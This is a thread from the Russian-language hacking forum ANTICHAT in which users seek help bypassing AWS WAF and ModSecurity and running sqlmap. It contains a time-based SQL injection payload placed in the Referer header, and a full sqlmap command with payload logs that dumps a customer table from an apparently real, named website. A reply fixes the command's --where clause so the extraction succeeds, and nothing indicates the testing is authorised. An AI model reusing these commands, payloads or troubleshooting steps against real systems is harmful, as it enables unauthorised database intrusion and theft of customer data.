ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.10.2019, 21:15
|
|
Новичок
Регистрация: 31.07.2018
Сообщений: 2
Провел на форуме: 529
Репутация:
0
|
|
Привет, может кто подскажет bypass к aws waf (Amazon)
Или как можно обойти эту защиту?
|
|
|

11.10.2019, 21:32
|
|
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
Провел на форуме: 92829
Репутация:
212
|
|
|
|
|

19.10.2019, 19:04
|
|
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме: 6200
Репутация:
0
|
|
Доброго времени суток. Получил такой результат со сканера:
This vulnerability affects /kontaktannonser/lista/.
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/GET
/kontaktannonser/lista/ HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/
Как правильно составить запрос для Sqlmap?
|
|
|

27.10.2019, 16:11
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от ex3x1
↑
Acunetix нашел 2 скули: Blind SQL Injection и SQL injection в двух разных скриптах. Сайт на движке WordPress. При попытке раскрутить через скульмап постоянно получаю ошибку: 406 (Not acceptable), скульмап определяет WAF - ModSecurity TrustWave. Пробовал различные комбинации тамперов - постоянно та же самая ошибка 406. Если вдруг у кого то есть время - прошу помощи, в ЛС скину всю инфу.
тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы
|
|
|

01.11.2019, 20:04
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Ребят кто как борится с got HTTP error code: 424 (HTTPError: Failed Dependency) ?
|
|
|

02.11.2019, 22:23
|
|
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме: 12641
Репутация:
0
|
|
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
[21:11:39] [INFO] retrieved:
[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:51] [INFO] retrieved:
[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'
[*] ending @ 21:11:51 /2019-11-02/
|
|
|

03.11.2019, 23:10
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме: 96779
Репутация:
5
|
|
Сообщение от Estet
↑
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
[21:11:39] [INFO] retrieved:
[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:51] [INFO] retrieved:
[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'[*] ending @ 21:11:51 /2019-11-02/
943 пост в этой тебе (предыдущая страница)
|
|
|

04.11.2019, 15:38
|
|
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме: 12641
Репутация:
0
|
|
Сообщение от karkajoi
↑
943 пост в этой тебе (предыдущая страница)
Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
|
|
|

04.11.2019, 16:02
|
|
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме: 12641
Репутация:
0
|
|
еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.
Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
|
|
|

04.11.2019, 16:54
|
|
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от Estet
↑
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:
Код:
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|